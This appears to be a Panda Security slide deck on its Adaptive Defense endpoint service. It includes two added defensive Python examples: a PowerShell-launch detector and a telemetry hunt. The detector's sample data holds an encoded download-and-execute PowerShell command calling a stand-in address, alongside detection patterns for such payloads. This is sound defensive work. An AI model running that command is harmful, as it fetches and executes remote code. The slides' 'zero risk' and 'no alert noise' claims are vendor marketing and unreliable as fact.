
Panda Adaptive Defense Platform and Services


1 Panda Adaptive Defense Platform and Services
A New Endpoint Protection Paradigm Josu Franco. Strategy and Technology Advisor.

2 Dynamics of digital life. “Nexus of forces”
Our current digital behaviour creates a complex, interconnected and hyper-dynamic environment. The perimeter is now wherever the user is. The complexity of IT systems increases their vulnerability to cyber-threats. The Evolution of Cyber Attacks

3 The Target is the Endpoint.
Attackers need to reach the endpoint because from there they can access other targets, exfiltrate information, steal credentials, gather intelligence, or deploy further attacks. (Figure: % of incidents by target. Source: Verizon Data Breach Investigations Report 2016.) The Malware Industry

4 The Gap is Getting Wider.
The figure shows the percentage of breaches where time to compromise, and separately time to discovery, was days or less, and how that percentage is increasing. Attackers are more efficient now than ever before. (Figure: Time to Compromise vs. Time to Discover. Source: Verizon Data Breach Investigations Report 2016.) The Detection Gap

5 Challenge #1: “Malwareless” attacks.
Attackers exploit social engineering and weaknesses in the design of security products. Example: the POWERWARE attack. No vulnerabilities exploited. No malicious URL involved. No malware file on disk. PowerShell encrypts the files. Conventional defences won't work. The Malware Industry
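The PowerWare pattern above leaves no file for a scanner to inspect, but it still has to start a process: a document macro launches PowerShell, which runs an encoded script in memory. That launch is visible in process-creation telemetry. The following is an added example, not Panda's code, of a small scorer run over constructed Sysmon-style process-creation records (field names follow Sysmon Event ID 1). The list of Office parents, the evasion switches, the payload markers, the threshold and the sample events are all assumptions made for illustration.

```python
"""Detecting a 'malwareless' PowerShell launch from process-creation telemetry.

Added example (not Panda's code). Events are constructed, Sysmon-style
process-creation records; field names follow Sysmon Event ID 1.
"""
import base64
import re

# Office applications that have no business spawning PowerShell (assumption).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Switches that hide the window, skip the profile or bypass execution policy.
EVASION_FLAGS = re.compile(
    r"-(?:nop|noprofile|noni|noninteractive|w(?:indowstyle)?\s+hidden|"
    r"e(?:p|xecutionpolicy)\s+bypass)\b", re.I)

# -EncodedCommand takes a base64 string of the UTF-16LE script text.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Markers of download-and-execute and in-memory .NET crypto: a script can
# fetch code and encrypt files this way without a binary ever touching disk.
PAYLOAD_MARKERS = re.compile(
    r"DownloadString|Invoke-Expression|\bIEX\b|RijndaelManaged|AesManaged|"
    r"CreateEncryptor|FromBase64String", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent/undecodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev):
    """Score one process-creation event; returns (score, reasons)."""
    reasons = []
    if basename(ev["Image"]) not in {"powershell.exe", "pwsh.exe"}:
        return 0, reasons
    score = 0
    parent = basename(ev["ParentImage"])
    if parent in OFFICE_PARENTS:
        score += 3
        reasons.append(f"launched by Office application {parent}")
    flags = sorted({f.lower() for f in EVASION_FLAGS.findall(ev["CommandLine"])})
    if flags:
        score += len(flags)
        reasons.append("evasion switches: " + ", ".join(flags))
    payload = decode_encoded_command(ev["CommandLine"])
    if payload is not None:
        score += 1
        reasons.append("encoded command line")
        markers = sorted({m.lower() for m in PAYLOAD_MARKERS.findall(payload)})
        if markers:
            score += 3
            reasons.append("decoded payload contains: " + ", ".join(markers))
    return score, reasons


def detect(events, threshold=4):
    """Return an alert for every event scoring at or above the threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"ProcessId": ev["ProcessId"], "score": score, "reasons": reasons})
    return alerts


# --- constructed sample input -------------------------------------------
# The attacker-side script is encoded exactly as `powershell -Enc` expects it.
PAYLOAD_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/s.ps1')"
ENCODED_PAYLOAD = base64.b64encode(PAYLOAD_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {   # macro-enabled document launching a hidden, encoded PowerShell
        "ProcessId": 4412,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
        "CommandLine": f"powershell.exe -NoP -W Hidden -Enc {ENCODED_PAYLOAD}",
    },
    {   # routine admin script started from the desktop: no signal
        "ProcessId": 5120,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell.exe -File C:\Scripts\nightly-backup.ps1",
    },
    {   # policy bypass from cmd.exe: noted, but below the alert threshold alone
        "ProcessId": 6001,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'powershell.exe -ExecutionPolicy Bypass -Command "Get-ChildItem C:\Logs"',
    },
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["ProcessId"], alert["score"], "; ".join(alert["reasons"]))
```

The point of the scoring is that no single feature is decisive: an execution-policy bypass from cmd.exe is everyday administration and scores 1, while an Office parent plus hidden window plus an encoded payload that downloads and executes code scores 9 and fires. The decoder matters because signature matching on the raw command line sees only base64; the markers are only visible after decoding the UTF-16LE script.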

6 Challenge #2: Agent clutter prevents visibility.
Non-integrated solutions create complexity, performance issues, and lack of visibility. The Malware Industry

7 Challenge #3: Alert noise
Only 4% of alerts are ever investigated. “Two-thirds of the time spent by security staff responding to malware alerts is wasted because of faulty intelligence.” “It costs organizations an average of $1.27 million annually in time wasted responding to erroneous or inaccurate malware alerts.” (Figure: 4%. Source: Ponemon Institute, “The cost of malware containment”, n=630.) The Malware Industry

8 The Prevailing Endpoint Security Paradigm…
… is based on point-in-time detection of known malicious processes only, which means that all suspicious activity has to be investigated case by case, and all unknown malicious processes are allowed to run. That is why attackers skirt around these systems so easily and their attacks' success rate is so high. The result is a higher success rate for attacks: a detection gap. (Diagram: running processes split into Malware, Suspicious and Unknown; Suspicious means more effort, Unknown means more risk.) A New Approach to Endpoint Security

9 Malware Detection Gap: Blacklist Model.
(Figure: malware detection gap under the blacklist model. Source: Panda Research, Jan.-Jun., 6 months, 16 M samples.) The Detection Gap

10 Panda Adaptive Defense security Paradigm.
It is based on the classification of absolutely all running processes on your network. All activity of all programs is monitored and analysed in real time. All behaviours are verified by a managed service, so admins don't have to investigate anything. Higher level of protection, less effort, and no risk for you. (Diagram: Real-time Visibility, Integrated Forensic Analysis, Managed Service; all processes are classified as Goodware, Malware, Unknown or Suspicious; no application can run if it is not trusted, so Unknown means zero risk; the result is a higher protection rate with minimum effort.) A New Approach to Endpoint Security

11 Evolution of Panda Security Protection Capabilities
Panda Adaptive Defense is a managed cybersecurity service based on three pillars: product, technologies and services, all designed to work together. On the customer side, all that is needed is an agent on every endpoint that monitors all activity at the endpoint: processes, network connections, registry, changes to the OS, access to data files, etc. This metadata is used by the Adaptive Defense Platform in the cloud, and by Panda's and Deloitte's analysts, to determine the nature of each executable file and its behaviour. The data is also used to detect insiders or external attackers who might be attempting to infiltrate the network, or to exfiltrate data if they are already inside. The classification of all files is delivered through the 100% Attestation Service. In most cases (99.98% currently) it is performed automatically by the system using machine learning techniques. If needed, unknown applications are detonated in a custom-made array of physical sandboxes (not VMs, because a VM environment can be fingerprinted by malware) and their behaviour is extracted. The remaining 0.02% is classified by Panda analysts. The service always covers 100% of applications. However, as attackers evolve and adapt their methods, it is necessary to look beyond the classification of files and hunt for attacks that use other, more advanced methods. Therefore Panda Security's hunters, jointly with Deloitte's experts, provide the Threat Hunting and Investigation Service. This service uses proprietary machine learning algorithms and the expertise of threat hunters to spot anomalies and Indicators of Attack across all endpoints protected by Adaptive Defense. Searches can be done in real time and retrospectively, by looking at the historical behaviour profiles of machines, applications and the network. Adaptive Defense is managed through a cloud-based console, which provides deployment, configuration and reporting options at various levels.
An Advanced Reporting Tool, accessible from the main AD console, offers in-depth visibility and insight into all the activity monitored at the endpoints (who is using which applications and when, which data is being accessed, which running applications are vulnerable, etc.). In this way customers have real-time access to all the metadata being collected. The Adaptive Defense Platform can also be integrated with third-party systems via APIs, or specifically with SIEM products via a SIEM-Feeder, to augment the customer's own security infrastructure. An important part of Panda's strategy is to partner with Managed Security Service Providers and Managed Detection and Response providers. By leveraging the AD platform and its services, they can offer additional value, protection and insight, providing last-mile services tailored to each customer: understanding each customer's context, hunting for targeted threats, helping them reduce the attack surface, or complementing the endpoint-based capabilities of Adaptive Defense with additional security management, for instance.
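The retrospective search described above, and the "who ran what, when" reporting, only work if the agent's metadata (process starts, parent links, outbound connections) is retained for every process, not just for those that raised an alert at the time. The following is an added example, not Panda's code, of the data model behind such a query. It also contrasts the two admission rules from the earlier slides: the prevailing blacklist model, under which an unknown application is allowed to run, and the classify-everything model, under which nothing runs until it is classified as goodware. In the scenario an application runs as unknown, is later classified as malware, and the store answers which hosts and users ran it, since when, and where it or its child processes connected. Hosts, users, hash placeholders, addresses and timestamps are constructed.

```python
"""Retrospective hunt over retained endpoint metadata.

Added example (not Panda's code). Models the metadata an endpoint agent
collects (process start, parent link, outbound connection) and a verdict
table fed by a classification service. All hosts, users, hashes and
addresses below are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass

GOODWARE, MALWARE, UNKNOWN = "goodware", "malware", "unknown"


@dataclass(frozen=True)
class ProcEvent:
    ts: int            # epoch seconds
    host: str
    user: str
    pid: int
    sha256: str        # hash of the executable image (placeholder strings here)
    image: str
    parent_pid: int    # 0 when the parent was not observed
    remote: str = ""   # "ip:port" when this record is an outbound connection


class TelemetryStore:
    """Keeps every event, not only alerts, so later questions can be answered."""

    def __init__(self):
        self.events = []
        self.verdicts = {}  # sha256 -> verdict from the classification service

    def record(self, ev):
        self.events.append(ev)

    def classify(self, sha256, verdict):
        self.verdicts[sha256] = verdict

    def blacklist_allows(self, sha256):
        # Prevailing model: only known malware is stopped; unknown is allowed to run.
        return self.verdicts.get(sha256, UNKNOWN) != MALWARE

    def attestation_allows(self, sha256):
        # Classify-everything model: nothing runs until it is classified goodware.
        return self.verdicts.get(sha256, UNKNOWN) == GOODWARE

    def descendants(self, host, pid):
        """PIDs spawned, directly or indirectly, by (host, pid).
        PID reuse over time is ignored for brevity."""
        children = defaultdict(set)
        for ev in self.events:
            if ev.host == host and ev.parent_pid and not ev.remote:
                children[ev.parent_pid].add(ev.pid)
        found, stack = set(), [pid]
        while stack:
            for child in children[stack.pop()]:
                if child not in found:
                    found.add(child)
                    stack.append(child)
        return found

    def hunt(self, sha256):
        """Blast radius of one hash: per host, the users who ran it, the first
        time it was seen, and outbound connections by it or its descendants."""
        report = {}
        for ev in self.events:
            if ev.sha256 != sha256 or ev.remote:
                continue  # only process-start records of the hunted hash
            entry = report.setdefault(
                ev.host, {"users": set(), "first_seen": ev.ts, "connections": set()})
            entry["users"].add(ev.user)
            entry["first_seen"] = min(entry["first_seen"], ev.ts)
            tree = {ev.pid} | self.descendants(ev.host, ev.pid)
            for other in self.events:
                if other.host == ev.host and other.pid in tree and other.remote:
                    entry["connections"].add((other.image, other.remote))
        return report


# --- constructed sample telemetry -----------------------------------------
EVENTS = [
    ProcEvent(1000, "ws-01", "alice", 400, "h-winword", "winword.exe", 100),
    ProcEvent(1005, "ws-01", "alice", 512, "h-updater", "updater.exe", 400),
    ProcEvent(1010, "ws-01", "alice", 512, "h-updater", "updater.exe", 400, "203.0.113.7:443"),
    ProcEvent(2000, "ws-07", "bob", 731, "h-updater", "updater.exe", 0),
    ProcEvent(2003, "ws-07", "bob", 802, "h-powershell", "powershell.exe", 731),
    ProcEvent(2010, "ws-07", "bob", 802, "h-powershell", "powershell.exe", 731, "203.0.113.7:8443"),
    ProcEvent(2100, "ws-12", "carol", 220, "h-chrome", "chrome.exe", 0, "198.51.100.10:443"),
]


def scenario():
    """updater.exe runs while still unknown; the malware verdict arrives later."""
    store = TelemetryStore()
    for ev in EVENTS:
        store.record(ev)
    for known_good in ("h-winword", "h-powershell", "h-chrome"):
        store.classify(known_good, GOODWARE)
    # At launch time updater.exe is unclassified: blacklist lets it run, attestation would not.
    at_launch = (store.blacklist_allows("h-updater"), store.attestation_allows("h-updater"))
    store.classify("h-updater", MALWARE)  # sandbox/analyst verdict arrives later
    return at_launch, store.hunt("h-updater")


if __name__ == "__main__":
    at_launch, report = scenario()
    print("blacklist allowed:", at_launch[0], "| attestation allowed:", at_launch[1])
    for host, entry in sorted(report.items()):
        print(host, sorted(entry["users"]), entry["first_seen"], sorted(entry["connections"]))
```

The hunt walks the process tree on each host, so the outbound connection on ws-07 is attributed to the hunted hash even though it was made by a child PowerShell, not by updater.exe itself; ws-12, where only trusted software ran, does not appear. The same store answers the reporting questions (which user ran which image, and when) from the `ProcEvent` records directly.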

12 Architecture & components
(Architecture diagram; labels: Panda Security, MSSP & MDR, Customers' environment. The speaker notes repeat those of slide 11.)

13 Main Differentiators and Benefits.
100% Attestation Service and Threat Hunting and Investigation Service. Ensures the trustworthiness of all running processes. Allows a continuous response to hackers and insider threats. Closes the detection gap and adapts to the evolution of threats. Integrated prevention, detection and response against malware and malwareless attacks. Eliminates agent clutter from multiple vendors. Simplifies management and reporting efforts. Cloud-based solution: no maintenance costs and always up to date. Visibility of past and present endpoint activity in one integrated architecture. Provides in-depth insight into all endpoint activity, not only malware. Automated investigation minimizes time spent on incidents. No alert noise. Enables scalability of managed security services and Managed Detection & Response. The Malware Industry

14 Reinventing Cybersecurity.

